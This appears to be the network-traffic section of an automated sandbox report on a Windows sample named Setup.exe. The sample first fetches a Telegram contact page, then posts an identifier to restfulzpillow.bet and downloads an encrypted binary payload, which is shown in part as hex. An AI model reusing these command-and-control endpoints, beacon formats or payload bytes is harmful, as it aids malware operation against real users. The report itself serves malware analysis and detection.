                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.687776089 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.687797070 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.692780972 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.692854881 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.692864895 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.697757006 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.697807074 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.697815895 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.702698946 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.702748060 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.702758074 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.708945990 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.708993912 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.709005117 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.710966110 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.711025000 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.711038113 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.715089083 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.715136051 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.715146065 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.719221115 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.719266891 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.719278097 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.723436117 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.723525047 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.723535061 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.727416992 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.727490902 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.727505922 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.731580019 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.731652021 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.731661081 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.735703945 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.735773087 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.735783100 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.739728928 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.739784956 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.739795923 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.742867947 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.742923021 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.742934942 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.745229959 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.745285034 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.745300055 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.748079062 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.748168945 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.748184919 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.750817060 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.750880957 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.750897884 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.753515959 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.753575087 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.753599882 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.756151915 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.756246090 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.756268024 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.758963108 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.759026051 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.759048939 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.769551992 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.769584894 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.769612074 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.769630909 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.769670963 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.769679070 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.774704933 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.774749041 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.774760008 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.774775982 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.774815083 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.774821997 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.774919033 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.774979115 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.775118113 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.775135994 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:49.714145899 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:49.714191914 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:49.714302063 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:49.714654922 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:49.714673996 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.617604971 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.617989063 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.618006945 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.619091034 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.619165897 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.620153904 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.620255947 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.660576105 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.660598993 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.708641052 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:43:01.284352064 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:43:01.284449100 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:43:01.284682035 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:43:02.585779905 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:43:02.585846901 CET44349720142.250.74.196192.168.2.16

                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                      Mar 11, 2025 00:42:35.683386087 CET5381753192.168.2.161.1.1.1
                                                                                                                                                                                                                      Mar 11, 2025 00:42:35.690406084 CET53538171.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:38.311512947 CET5292053192.168.2.161.1.1.1
                                                                                                                                                                                                                      Mar 11, 2025 00:42:38.325000048 CET53529201.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:39.217739105 CET138138192.168.2.16192.168.2.255
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.198853016 CET53545281.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.394942045 CET53601211.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.427932978 CET6278553192.168.2.161.1.1.1
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.428266048 CET6225353192.168.2.161.1.1.1
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.435072899 CET53627851.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.435096979 CET53622531.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.381926060 CET53652491.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.385143042 CET53541321.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:49.206259012 CET53599651.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:49.720303059 CET53585001.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:52.347181082 CET5674353192.168.2.161.1.1.1
                                                                                                                                                                                                                      Mar 11, 2025 00:42:52.347471952 CET6279253192.168.2.161.1.1.1
                                                                                                                                                                                                                      Mar 11, 2025 00:42:52.352859020 CET53544161.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:52.353920937 CET53567431.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:52.354521036 CET53627921.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:53.342031002 CET5806453192.168.2.161.1.1.1
                                                                                                                                                                                                                      Mar 11, 2025 00:42:53.342185020 CET5345953192.168.2.161.1.1.1
                                                                                                                                                                                                                      Mar 11, 2025 00:42:53.348855019 CET53580641.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:53.349056959 CET53534591.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:43:03.462310076 CET5824853192.168.2.161.1.1.1
                                                                                                                                                                                                                      Mar 11, 2025 00:43:03.474621058 CET53582481.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:43:05.417079926 CET53614501.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:43:20.504508972 CET4981653192.168.2.161.1.1.1
                                                                                                                                                                                                                      Mar 11, 2025 00:43:20.517044067 CET53498161.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:43:24.158230066 CET53565151.1.1.1192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:43:39.252681971 CET6014953192.168.2.161.1.1.1
                                                                                                                                                                                                                      Mar 11, 2025 00:43:39.265891075 CET53601491.1.1.1192.168.2.16

                                                                                                                                                                                                                      ICMP Packets

                                                                                                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.381966114 CET192.168.2.161.1.1.1c205(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                      Mar 11, 2025 00:42:35.683386087 CET192.168.2.161.1.1.10x7fc8Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:42:38.311512947 CET192.168.2.161.1.1.10xc71cStandard query (0)restfulzpillow.betA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.427932978 CET192.168.2.161.1.1.10x2a4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.428266048 CET192.168.2.161.1.1.10x2db4Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:42:52.347181082 CET192.168.2.161.1.1.10x17d5Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:42:52.347471952 CET192.168.2.161.1.1.10x20f2Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:42:53.342031002 CET192.168.2.161.1.1.10x2530Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:42:53.342185020 CET192.168.2.161.1.1.10x39acStandard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:43:03.462310076 CET192.168.2.161.1.1.10x36e7Standard query (0)restfulzpillow.betA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:43:20.504508972 CET192.168.2.161.1.1.10x61e8Standard query (0)restfulzpillow.betA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:43:39.252681971 CET192.168.2.161.1.1.10x58e6Standard query (0)restfulzpillow.betA (IP address)IN (0x0001)false

                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                      Mar 11, 2025 00:42:35.690406084 CET1.1.1.1192.168.2.160x7fc8No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:42:38.325000048 CET1.1.1.1192.168.2.160xc71cNo error (0)restfulzpillow.bet104.21.11.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:42:38.325000048 CET1.1.1.1192.168.2.160xc71cNo error (0)restfulzpillow.bet172.67.166.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.435072899 CET1.1.1.1192.168.2.160x2a4No error (0)www.google.com142.250.74.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.435096979 CET1.1.1.1192.168.2.160x2db4No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:42:52.353920937 CET1.1.1.1192.168.2.160x17d5No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:42:52.353920937 CET1.1.1.1192.168.2.160x17d5No error (0)plus.l.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:42:52.354521036 CET1.1.1.1192.168.2.160x20f2No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:42:53.348855019 CET1.1.1.1192.168.2.160x2530No error (0)play.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:43:03.474621058 CET1.1.1.1192.168.2.160x36e7No error (0)restfulzpillow.bet172.67.166.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:43:03.474621058 CET1.1.1.1192.168.2.160x36e7No error (0)restfulzpillow.bet104.21.11.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:43:20.517044067 CET1.1.1.1192.168.2.160x61e8No error (0)restfulzpillow.bet104.21.11.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:43:20.517044067 CET1.1.1.1192.168.2.160x61e8No error (0)restfulzpillow.bet172.67.166.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:43:39.265891075 CET1.1.1.1192.168.2.160x58e6No error (0)restfulzpillow.bet172.67.166.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Mar 11, 2025 00:43:39.265891075 CET1.1.1.1192.168.2.160x58e6No error (0)restfulzpillow.bet104.21.11.150A (IP address)IN (0x0001)false

                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                      • t.me
                                                                                                                                                                                                                      • restfulzpillow.bet
                                                                                                                                                                                                                      • www.google.com

                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      0192.168.2.1649701149.154.167.994436556C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-10 23:42:37 UTC67OUTGET /owowoowokk3j4 HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Host: t.me
                                                                                                                                                                                                                      2025-03-10 23:42:38 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                                                                      Date: Mon, 10 Mar 2025 23:42:38 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                      Content-Length: 12417
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: stel_ssid=35aef6c15fabadbfda_4688273857333314051; expires=Tue, 11 Mar 2025 23:42:38 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Cache-control: no-store
                                                                                                                                                                                                                      X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                      2025-03-10 23:42:38 UTC12417INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6f 77 6f 77 6f 6f 77 6f 6b 6b 33 6a 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77
                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @owowoowokk3j4</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      1192.168.2.1649703104.21.11.1504436556C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-10 23:42:41 UTC267OUTPOST /bWij HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Content-Length: 41
                                                                                                                                                                                                                      Host: restfulzpillow.bet
                                                                                                                                                                                                                      2025-03-10 23:42:41 UTC41OUTData Raw: 75 69 64 3d 38 33 31 65 66 35 65 30 33 39 62 31 31 64 62 33 65 66 37 63 33 36 37 31 30 33 65 32 65 35 65 39 26 63 69 64 3d
                                                                                                                                                                                                                      Data Ascii: uid=831ef5e039b11db3ef7c367103e2e5e9&cid=
                                                                                                                                                                                                                      2025-03-10 23:42:42 UTC792INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Mon, 10 Mar 2025 23:42:41 GMT
                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                      Content-Length: 14134
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dxoe85RldFjBwU%2BeHjPHxJil%2FJeGg5mZ9dFbIYdJ3t42n91JdaIX0lutNbzETklUzpOcNtB%2BDU%2FwVBR5TuWGYbq0ADoNklsuFlPAVeV96uQkjWwEHkrPV%2BIwCbHgJNFsgi4N%2Bss%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 91e6ab85cd1a4356-EWR
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=9539&min_rtt=8744&rtt_var=3837&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=944&delivery_rate=238550&cwnd=240&unsent_bytes=0&cid=21308640423a952a&ts=886&x=0"
                                                                                                                                                                                                                      2025-03-10 23:42:42 UTC577INData Raw: 25 a8 90 fc a1 b0 0a b7 2d 2b 03 54 87 67 c6 2e 32 a7 58 c6 4b 33 bf 34 19 25 c2 9b e9 31 ec 5a cc 0c 5c 4f a4 4a 63 c0 0a 68 76 b3 1a af 22 02 2f 53 ae 52 6e e3 b4 df 0a a6 0a e6 26 66 f2 dd 93 a8 b6 b6 1e 8d 30 40 0a 99 bf 86 96 e5 74 45 79 9b 8e 35 10 18 a2 36 b5 d6 36 86 61 ef df 89 ba 2a dc 21 37 53 70 ff 16 dd 06 ac f6 72 dc 34 14 77 5e a3 36 07 87 18 ec b3 31 4c 81 ae 18 a4 d4 c1 c0 6c 01 fa 3b c6 6b b5 80 5e 6d 28 1a d8 32 5f 8e b2 d4 9a 4f 56 a9 72 2e 62 49 7e eb 4a e8 34 5b c3 74 cb 52 7e c0 a5 4e 30 68 ed b1 ea 66 87 63 88 51 96 b7 3d 09 b9 93 6c 4b 33 ca 8a c3 a8 a4 3a 6e 62 77 78 1b b7 ca 2d 34 39 fb a6 6f 3c 5f df 7f c3 49 b0 00 2b 42 cb 7a 19 2b 9e 32 72 f9 3f e9 a7 16 d8 21 f6 15 5c f9 cb 25 eb c6 60 9d 30 75 f5 dd 58 3a 34 d6 0f e9 2a b1
                                                                                                                                                                                                                      Data Ascii: %-+Tg.2XK34%1Z\OJchv"/SRn&f0@tEy566a*!7Spr4w^61Ll;k^m(2_OVr.bI~J4[tR~N0hfcQ=lK3:nbwx-49o<_I+Bz+2r?!\%`0uX:4*
                                                                                                                                                                                                                      2025-03-10 23:42:42 UTC1369INData Raw: 61 46 ee fd 02 e6 49 a6 6b 51 e6 6e cb 15 d2 6c 9e 26 cb 30 85 6e c1 c3 9b e6 1f da 8d dc d0 96 2a 19 be 3f 21 a3 ec 5a 21 07 e5 57 3d 6a 22 2f 90 55 b9 79 47 1f 5d c2 89 4d 21 bc 88 44 d0 a4 80 77 2e 9b f8 88 09 f0 31 98 14 99 f3 3d 55 6d 57 5d 04 28 c1 60 5b 74 ac b2 5b 7e 80 49 78 89 52 35 76 c9 4e 62 64 c8 45 37 28 ae 58 48 fa 26 57 9a bc 83 2e ac 8c ad 0a db d0 24 c3 0b f0 58 e2 ad d0 eb eb ed ed 18 51 b8 b7 1c 68 24 81 b7 68 b3 d4 21 19 91 02 84 da 08 e9 98 76 d2 a1 4c 37 b8 ca af c5 e1 dc c6 09 24 d7 39 2c ea 98 da c4 fe 59 e2 ca a1 fc 1f ed 37 08 25 47 7a ba 91 7f 2d a7 4f 7c 7f f6 a3 24 8f dd a5 f5 20 45 26 3b ff d6 e5 2a 44 1c 72 c9 d2 ba 0c a7 0b a4 91 a1 d8 7e 64 eb 74 6d 26 2e 41 3a 44 fc eb cd f0 23 c7 da 54 d9 10 1e 4c c5 f2 ed d9 d7 9a fd
                                                                                                                                                                                                                      Data Ascii: aFIkQnl&0n*?!Z!W=j"/UyG]M!Dw.1=UmW](`[t[~IxR5vNbdE7(XH&W.$XQh$h!vL7$9,Y7%Gz-O|$ E&;*Dr~dtm&.A:D#TL
                                                                                                                                                                                                                      2025-03-10 23:42:42 UTC1369INData Raw: a2 b6 3f 19 2d ad ed c1 cf 4e 3b 41 c9 f3 a3 9e f2 36 d8 b7 5f 69 df f7 66 08 81 45 ef cc 96 ef 65 9e c3 d5 ed fe 84 92 33 f6 42 5d d8 41 f2 c9 dc 9c ab d0 6a bd 0b 52 0d ea 1f 73 13 5a e2 a5 70 3e 46 4f 9c b6 aa ab 71 7a 22 5a 05 f1 9b 18 a9 67 50 b0 85 76 30 50 3b 3f 09 74 94 21 c0 f1 85 35 aa 98 c0 01 43 43 f1 c4 1a 5d fb e5 d9 f3 f4 07 de 64 5b 4a 2d e1 f4 9c ea 99 a9 3a 46 28 f4 f5 12 86 a8 53 22 46 79 da b5 38 40 e1 1c b0 23 a6 86 54 dc de 2a 5e 2a 67 39 a1 b7 f4 3b bc 67 bb 6e e2 b5 8d 02 77 4b 14 39 59 fe 02 97 fd 36 33 84 2d 70 ea e6 44 1f df 06 74 9a 29 b6 a3 95 c1 a2 55 0a 24 4b aa 51 4c ab b0 a7 92 b5 50 c2 b7 01 a0 3f af e5 69 a9 e9 63 9c 0c ae 83 0c 3a 19 8b c3 ee a6 c6 7b c3 13 b7 36 27 58 0c 90 bc de 33 94 75 e1 90 37 f4 c7 e8 f1 8d 1c 73
                                                                                                                                                                                                                      Data Ascii: ?-N;A6_ifEe3B]AjRsZp>FOqz"ZgPv0P;?t!5CC]d[J-:F(S"Fy8@#T*^*g9;gnwK9Y63-pDt)U$KQLP?ic:{6'X3u7s
